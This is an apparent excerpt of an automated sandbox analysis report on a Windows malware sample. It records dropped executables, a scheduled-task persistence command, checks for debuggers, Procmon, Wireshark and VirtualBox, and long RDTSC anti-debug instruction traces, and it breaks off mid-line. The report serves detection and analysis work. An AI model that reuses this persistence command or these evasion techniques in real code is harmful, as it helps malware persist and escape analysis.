Source: 8kl5nJ3f9x.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_0007A499 push es; iretd 13_2_0007A694
Source: 8kl5nJ3f9x.exe Static PE information: section name: xxuhznbt entropy: 7.956700776729312
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1489D3E second address: 1489D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1489D46 second address: 1489D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1489D4A second address: 1489D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1490F25 second address: 1490F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jne 00007F8C6D17D0A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1490F36 second address: 1490F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8C6CC64786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1490F40 second address: 1490F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1490F44 second address: 1490F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1492D6A second address: 1492D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1492D71 second address: 1492DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 je 00007F8C6CC64788h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jp 00007F8C6CC647A6h 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F8C6CC64798h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1492DCB second address: 1492DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F8C6D17D0ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1492DD8 second address: 1492DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a jmp 00007F8C6CC64793h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1492EFC second address: 1492F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C6D17D0B3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 149300E second address: 1493022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1493022 second address: 149302B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 149302B second address: 1493043 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnc 00007F8C6CC64788h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1493043 second address: 1493052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1493052 second address: 1493058 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1493128 second address: 149312E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 149312E second address: 1493166 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C6CC64793h 0x00000008 jmp 00007F8C6CC6478Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnc 00007F8C6CC64786h 0x00000019 jmp 00007F8C6CC64796h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B4B3D second address: 14B4B42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B4B42 second address: 14B4B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8C6CC64786h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B4B55 second address: 14B4B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1483144 second address: 1483148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B2DB4 second address: 14B2DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B2DBD second address: 14B2DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F8C6CC64788h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B2DD1 second address: 14B2DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B34D7 second address: 14B34DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B364C second address: 14B3666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B37C1 second address: 14B37CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8C6CC64786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B42D0 second address: 14B42D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B619F second address: 14B61B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007F8C6CC6478Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB453 second address: 14BB468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB468 second address: 14BB477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB477 second address: 14BB481 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB8FF second address: 14BB903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB903 second address: 14BB91F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8C6D17D0B0h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BA994 second address: 14BA99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BBBE6 second address: 14BBBEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BBBEC second address: 14BBBF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BCF4A second address: 14BCF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C1FEF second address: 14C1FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C1FF7 second address: 14C1FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C1FFD second address: 14C2026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C6CC64797h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2026 second address: 14C2030 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C6D17D0B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2A4C second address: 14C2A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2A56 second address: 14C2A60 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2A60 second address: 14C2A6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6252 second address: 14C6257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6257 second address: 14C625D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6900 second address: 14C6906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6906 second address: 14C690C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C690C second address: 14C696E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8C6D17D0B4h 0x00000011 xchg eax, ebx 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F8C6D17D0A8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F8C6D17D0AEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C696E second address: 14C6974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CA7 second address: 14C6CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CAB second address: 14C6CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CAF second address: 14C6CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8C6D17D0A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CC1 second address: 14C6CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CC7 second address: 14C6CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C6D17D0B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6EBB second address: 14C6ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC6478Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C74D7 second address: 14C7556 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F8C6D17D0A6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jl 00007F8C6D17D0A6h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F8C6D17D0A8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jmp 00007F8C6D17D0B2h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F8C6D17D0A8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D38E9h] 0x00000056 push 